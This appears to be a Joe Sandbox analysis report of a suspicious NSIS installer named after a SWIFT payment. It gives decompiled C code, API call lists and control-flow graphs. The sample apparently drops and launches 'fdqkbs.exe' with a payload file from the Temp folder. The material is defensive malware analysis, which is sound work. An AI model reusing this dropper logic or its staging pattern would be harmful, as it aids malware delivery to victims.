                                                                                  0x00000000
                                                                                  0x0040446c
                                                                                  0x00404470
                                                                                  0x00404495
                                                                                  0x0040449b
                                                                                  0x004044a1
                                                                                  0x004044a3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004044c9
                                                                                  0x004044cf
                                                                                  0x004044d1
                                                                                  0x004044d6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004044dc
                                                                                  0x004044df
                                                                                  0x004044e2
                                                                                  0x004044f9
                                                                                  0x00404505
                                                                                  0x0040451e
                                                                                  0x00404524
                                                                                  0x00404528
                                                                                  0x0040452d
                                                                                  0x00404533
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040453d
                                                                                  0x00404548
                                                                                  0x00000000
                                                                                  0x00404548
                                                                                  0x00404472
                                                                                  0x00404478
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040447e
                                                                                  0x00404484
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040448a
                                                                                  0x0040445e
                                                                                  0x00404555
                                                                                  0x00404561
                                                                                  0x00404568
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x004042b3
                                                                                  0x004042b6
                                                                                  0x004042e9
                                                                                  0x004042e9
                                                                                  0x004042eb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004042eb
                                                                                  0x004042b8
                                                                                  0x004042bc
                                                                                  0x004042c1
                                                                                  0x004042c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004042d3
                                                                                  0x004042db
                                                                                  0x00000000
                                                                                  0x004042e1
                                                                                  0x004040e9
                                                                                  0x004040e9
                                                                                  0x004040ed
                                                                                  0x004040f2
                                                                                  0x00404101
                                                                                  0x00404101
                                                                                  0x00404107
                                                                                  0x0040410e
                                                                                  0x00404152
                                                                                  0x00404158
                                                                                  0x00404171
                                                                                  0x00404174
                                                                                  0x00404187
                                                                                  0x0040418d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404193
                                                                                  0x0040419e
                                                                                  0x004041a0
                                                                                  0x004041a2
                                                                                  0x004041c1
                                                                                  0x004041c1
                                                                                  0x004041c4
                                                                                  0x004041c9
                                                                                  0x004041cc
                                                                                  0x004041dc
                                                                                  0x004041dd
                                                                                  0x004041df
                                                                                  0x00404215
                                                                                  0x00404225
                                                                                  0x00000000
                                                                                  0x00404225
                                                                                  0x004041e1
                                                                                  0x004041e7
                                                                                  0x00404200
                                                                                  0x00404205
                                                                                  0x00404207
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404209
                                                                                  0x004041f5
                                                                                  0x004041f5
                                                                                  0x004041f7
                                                                                  0x004041f7
                                                                                  0x00000000
                                                                                  0x004041f7
                                                                                  0x004041ea
                                                                                  0x004041ef
                                                                                  0x00000000
                                                                                  0x004041ef
                                                                                  0x004041ce
                                                                                  0x004041d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004041d6
                                                                                  0x00000000
                                                                                  0x004041d6
                                                                                  0x004041c6
                                                                                  0x00000000
                                                                                  0x004041c6
                                                                                  0x004041ac
                                                                                  0x004041b3
                                                                                  0x004041b9
                                                                                  0x004041bb
                                                                                  0x00404591
                                                                                  0x00000000
                                                                                  0x00404591
                                                                                  0x00000000
                                                                                  0x004041bb
                                                                                  0x00404179
                                                                                  0x00000000
                                                                                  0x00404181
                                                                                  0x00404160
                                                                                  0x00404166
                                                                                  0x0040456e
                                                                                  0x0040456e
                                                                                  0x00404574
                                                                                  0x00404581
                                                                                  0x00404587
                                                                                  0x00404587
                                                                                  0x00000000
                                                                                  0x00404110
                                                                                  0x00404115
                                                                                  0x00404121
                                                                                  0x0040412a
                                                                                  0x0040422b
                                                                                  0x00000000
                                                                                  0x00404149
                                                                                  0x0040414c
                                                                                  0x00000000
                                                                                  0x0040414c
                                                                                  0x0040412a
                                                                                  0x0040410e

                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                  • ShowWindow.USER32(?), ref: 00404121
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                  • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                  • DestroyWindow.USER32 ref: 00404160
                                                                                  • SetWindowLongW.USER32 ref: 00404179
                                                                                  • GetDlgItem.USER32 ref: 00404198
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                  • GetDlgItem.USER32 ref: 0040425E
                                                                                  • GetDlgItem.USER32 ref: 00404268
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                  • GetDlgItem.USER32 ref: 00404379
                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                  • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                  • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                  • EnableMenuItem.USER32 ref: 004043E4
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                  • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                  • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                  • String ID: H7B
                                                                                  • API String ID: 2475350683-2300413410
                                                                                  • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                  • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                  • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                  • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                  C-Code - Quality: 96%
                                                                                  			E00403D17(void* __eflags) {
                                                                                  				intOrPtr _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				int _v12;
                                                                                  				void _v16;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t22;
                                                                                  				void* _t30;
                                                                                  				void* _t32;
                                                                                  				int _t33;
                                                                                  				void* _t36;
                                                                                  				int _t39;
                                                                                  				int _t40;
                                                                                  				int _t44;
                                                                                  				short _t63;
                                                                                  				WCHAR* _t65;
                                                                                  				signed char _t69;
                                                                                  				WCHAR* _t76;
                                                                                  				intOrPtr _t82;
                                                                                  				WCHAR* _t87;
                                                                                  
                                                                                  				_t82 =  *0x42a270;
                                                                                  				_t22 = E00406A35(2);
                                                                                  				_t90 = _t22;
                                                                                  				if(_t22 == 0) {
                                                                                  					_t76 = 0x423748;
                                                                                  					L"1033" = 0x30;
                                                                                  					 *0x437002 = 0x78;
                                                                                  					 *0x437004 = 0;
                                                                                  					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                  					__eflags =  *0x423748;
                                                                                  					if(__eflags == 0) {
                                                                                  						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                  					}
                                                                                  					lstrcatW(L"1033", _t76);
                                                                                  				} else {
                                                                                  					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                                  				}
                                                                                  				E00403FED(_t78, _t90);
                                                                                  				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                                                  				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                                  				 *0x42a2fc = 0x10000;
                                                                                  				if(E0040603F(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                                                  					L16:
                                                                                  					if(E0040603F(_t98, _t86) == 0) {
                                                                                  						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                  					}
                                                                                  					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                  					 *0x429248 = _t30;
                                                                                  					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                  						L21:
                                                                                  						if(E0040140B(0) == 0) {
                                                                                  							_t32 = E00403FED(_t78, __eflags);
                                                                                  							__eflags =  *0x42a300;
                                                                                  							if( *0x42a300 != 0) {
                                                                                  								_t33 = E0040579D(_t32, 0);
                                                                                  								__eflags = _t33;
                                                                                  								if(_t33 == 0) {
                                                                                  									E0040140B(1);
                                                                                  									goto L33;
                                                                                  								}
                                                                                  								__eflags =  *0x42922c;
                                                                                  								if( *0x42922c == 0) {
                                                                                  									E0040140B(2);
                                                                                  								}
                                                                                  								goto L22;
                                                                                  							}
                                                                                  							ShowWindow( *0x423728, 5); // executed
                                                                                  							_t39 = E004069C5("RichEd20"); // executed
                                                                                  							__eflags = _t39;
                                                                                  							if(_t39 == 0) {
                                                                                  								E004069C5("RichEd32");
                                                                                  							}
                                                                                  							_t87 = L"RichEdit20W";
                                                                                  							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                  							__eflags = _t40;
                                                                                  							if(_t40 == 0) {
                                                                                  								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                  								 *0x429224 = _t87;
                                                                                  								RegisterClassW(0x429200);
                                                                                  							}
                                                                                  							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                                  							E00403C67(E0040140B(5), 1);
                                                                                  							return _t44;
                                                                                  						}
                                                                                  						L22:
                                                                                  						_t36 = 2;
                                                                                  						return _t36;
                                                                                  					} else {
                                                                                  						_t78 =  *0x42a260;
                                                                                  						 *0x429204 = E00401000;
                                                                                  						 *0x429210 =  *0x42a260;
                                                                                  						 *0x429214 = _t30;
                                                                                  						 *0x429224 = 0x40a3b4;
                                                                                  						if(RegisterClassW(0x429200) == 0) {
                                                                                  							L33:
                                                                                  							__eflags = 0;
                                                                                  							return 0;
                                                                                  						}
                                                                                  						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                  						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                  						goto L21;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t78 =  *(_t82 + 0x48);
                                                                                  					_t92 = _t78;
                                                                                  					if(_t78 == 0) {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_t76 = 0x428200;
                                                                                  					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                  					_t63 =  *0x428200; // 0x22
                                                                                  					if(_t63 == 0) {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					if(_t63 == 0x22) {
                                                                                  						_t76 = 0x428202;
                                                                                  						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                                  					}
                                                                                  					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                  					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                  						L15:
                                                                                  						E00406668(_t86, E00405F37(_t76));
                                                                                  						goto L16;
                                                                                  					} else {
                                                                                  						_t69 = GetFileAttributesW(_t76);
                                                                                  						if(_t69 == 0xffffffff) {
                                                                                  							L14:
                                                                                  							E00405F83(_t76);
                                                                                  							goto L15;
                                                                                  						}
                                                                                  						_t98 = _t69 & 0x00000010;
                                                                                  						if((_t69 & 0x00000010) != 0) {
                                                                                  							goto L15;
                                                                                  						}
                                                                                  						goto L14;
                                                                                  					}
                                                                                  				}
                                                                                  			}
























                                                                                  0x00403d1d
                                                                                  0x00403d26
                                                                                  0x00403d2d
                                                                                  0x00403d2f
                                                                                  0x00403d43
                                                                                  0x00403d55
                                                                                  0x00403d5e
                                                                                  0x00403d67
                                                                                  0x00403d6e
                                                                                  0x00403d73
                                                                                  0x00403d7a
                                                                                  0x00403d8d
                                                                                  0x00403d8d
                                                                                  0x00403d98
                                                                                  0x00403d31
                                                                                  0x00403d3c
                                                                                  0x00403d3c
                                                                                  0x00403d9d
                                                                                  0x00403da7
                                                                                  0x00403db0
                                                                                  0x00403db5
                                                                                  0x00403dc6
                                                                                  0x00403e58
                                                                                  0x00403e60
                                                                                  0x00403e69
                                                                                  0x00403e69
                                                                                  0x00403e7f
                                                                                  0x00403e85
                                                                                  0x00403e93
                                                                                  0x00403f14
                                                                                  0x00403f1c
                                                                                  0x00403f26
                                                                                  0x00403f2b
                                                                                  0x00403f31
                                                                                  0x00403fbb
                                                                                  0x00403fc0
                                                                                  0x00403fc2
                                                                                  0x00403fde
                                                                                  0x00000000
                                                                                  0x00403fde
                                                                                  0x00403fc4
                                                                                  0x00403fca
                                                                                  0x00403fd2
                                                                                  0x00403fd2
                                                                                  0x00000000
                                                                                  0x00403fca
                                                                                  0x00403f3f
                                                                                  0x00403f4a
                                                                                  0x00403f4f
                                                                                  0x00403f51
                                                                                  0x00403f58
                                                                                  0x00403f58
                                                                                  0x00403f63
                                                                                  0x00403f6b
                                                                                  0x00403f6d
                                                                                  0x00403f6f
                                                                                  0x00403f78
                                                                                  0x00403f7b
                                                                                  0x00403f81
                                                                                  0x00403f81
                                                                                  0x00403fa0
                                                                                  0x00403fb1
                                                                                  0x00000000
                                                                                  0x00403fb6
                                                                                  0x00403f1e
                                                                                  0x00403f20
                                                                                  0x00000000
                                                                                  0x00403e95
                                                                                  0x00403e95
                                                                                  0x00403ea1
                                                                                  0x00403eab
                                                                                  0x00403eb1
                                                                                  0x00403eb6
                                                                                  0x00403ec5
                                                                                  0x00403fe3
                                                                                  0x00403fe3
                                                                                  0x00000000
                                                                                  0x00403fe3
                                                                                  0x00403ed4
                                                                                  0x00403f0f
                                                                                  0x00000000
                                                                                  0x00403f0f
                                                                                  0x00403dcc
                                                                                  0x00403dcc
                                                                                  0x00403dcf
                                                                                  0x00403dd1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403ddf
                                                                                  0x00403df1
                                                                                  0x00403df6
                                                                                  0x00403dff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403e05
                                                                                  0x00403e07
                                                                                  0x00403e14
                                                                                  0x00403e14
                                                                                  0x00403e1d
                                                                                  0x00403e23
                                                                                  0x00403e4b
                                                                                  0x00403e53
                                                                                  0x00000000
                                                                                  0x00403e35
                                                                                  0x00403e36
                                                                                  0x00403e3f
                                                                                  0x00403e45
                                                                                  0x00403e46
                                                                                  0x00000000
                                                                                  0x00403e46
                                                                                  0x00403e41
                                                                                  0x00403e43
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403e43
                                                                                  0x00403e23

                                                                                  APIs
                                                                                    • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                    • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                  • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                  • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,746AFAA0), ref: 00403E18
                                                                                  • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                  • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,00000000,?), ref: 00403E36
                                                                                  • LoadImageW.USER32 ref: 00403E7F
                                                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                  • RegisterClassW.USER32 ref: 00403EBC
                                                                                  • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                  • CreateWindowExW.USER32 ref: 00403F09
                                                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                  • GetClassInfoW.USER32 ref: 00403F6B
                                                                                  • GetClassInfoW.USER32 ref: 00403F78
                                                                                  • RegisterClassW.USER32 ref: 00403F81
                                                                                  • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                  • API String ID: 1975747703-2848850402
                                                                                  • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                  • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                  • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                  • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                  C-Code - Quality: 98%
                                                                                  			E004030D0(void* __eflags, signed int _a4) {
                                                                                  				DWORD* _v8;
                                                                                  				DWORD* _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				long _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				signed int _v40;
                                                                                  				short _v560;
                                                                                  				long _t54;
                                                                                  				void* _t57;
                                                                                  				void* _t62;
                                                                                  				intOrPtr _t65;
                                                                                  				void* _t68;
                                                                                  				intOrPtr* _t70;
                                                                                  				long _t82;
                                                                                  				signed int _t89;
                                                                                  				intOrPtr _t92;
                                                                                  				long _t94;
                                                                                  				void* _t102;
                                                                                  				void* _t106;
                                                                                  				long _t107;
                                                                                  				long _t110;
                                                                                  				void* _t111;
                                                                                  
                                                                                  				_t94 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v12 = 0;
                                                                                  				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                                  				GetModuleFileNameW(0, L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x400);
                                                                                  				_t106 = E00406158(L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x80000000, 3);
                                                                                  				 *0x40a018 = _t106;
                                                                                  				if(_t106 == 0xffffffff) {
                                                                                  					return L"Error launching installer";
                                                                                  				}
                                                                                  				E00406668(L"C:\\Users\\engineer\\AppData\\Roaming", L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe");
                                                                                  				E00406668(0x439000, E00405F83(L"C:\\Users\\engineer\\AppData\\Roaming"));
                                                                                  				_t54 = GetFileSize(_t106, 0);
                                                                                  				 *0x420f00 = _t54;
                                                                                  				_t110 = _t54;
                                                                                  				if(_t54 <= 0) {
                                                                                  					L24:
                                                                                  					E0040302E(1);
                                                                                  					if( *0x42a274 == _t94) {
                                                                                  						goto L32;
                                                                                  					}
                                                                                  					if(_v12 == _t94) {
                                                                                  						L28:
                                                                                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                  						_t111 = _t57;
                                                                                  						E00406B90(0x40ce68);
                                                                                  						E00406187(0x40ce68,  &_v560, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                                                                                  						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                  						 *0x40a01c = _t62;
                                                                                  						if(_t62 != 0xffffffff) {
                                                                                  							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                                  							 *0x420f04 = _t65;
                                                                                  							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                  							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                  							if(_t68 == _v20) {
                                                                                  								 *0x42a270 = _t111;
                                                                                  								 *0x42a278 =  *_t111;
                                                                                  								if((_v40 & 0x00000001) != 0) {
                                                                                  									 *0x42a27c =  *0x42a27c + 1;
                                                                                  								}
                                                                                  								_t45 = _t111 + 0x44; // 0x44
                                                                                  								_t70 = _t45;
                                                                                  								_t102 = 8;
                                                                                  								do {
                                                                                  									_t70 = _t70 - 8;
                                                                                  									 *_t70 =  *_t70 + _t111;
                                                                                  									_t102 = _t102 - 1;
                                                                                  								} while (_t102 != 0);
                                                                                  								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                                                  								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                                  								return 0;
                                                                                  							}
                                                                                  							goto L32;
                                                                                  						}
                                                                                  						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                  					}
                                                                                  					E004035F8( *0x420ef0);
                                                                                  					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                  						goto L32;
                                                                                  					} else {
                                                                                  						goto L28;
                                                                                  					}
                                                                                  				} else {
                                                                                  					do {
                                                                                  						_t107 = _t110;
                                                                                  						asm("sbb eax, eax");
                                                                                  						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                                  						if(_t110 >= _t82) {
                                                                                  							_t107 = _t82;
                                                                                  						}
                                                                                  						if(E004035E2(0x418ef0, _t107) == 0) {
                                                                                  							E0040302E(1);
                                                                                  							L32:
                                                                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                  						}
                                                                                  						if( *0x42a274 != 0) {
                                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                                  								E0040302E(0);
                                                                                  							}
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                                  						_t89 = _v40;
                                                                                  						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                  							_a4 = _a4 | _t89;
                                                                                  							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                  							_t92 = _v16;
                                                                                  							 *0x42a274 =  *0x420ef0;
                                                                                  							if(_t92 > _t110) {
                                                                                  								goto L32;
